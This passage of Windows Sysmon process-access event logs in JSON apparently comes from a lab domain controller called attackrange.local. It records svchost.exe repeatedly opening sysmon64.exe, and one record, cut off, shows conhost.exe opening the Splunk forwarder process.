C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2262,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2263,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2264,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2265,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2266,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2267,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2268,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:53.344","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2269,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:53.344\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01CD-5F25-0000-001074140400}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 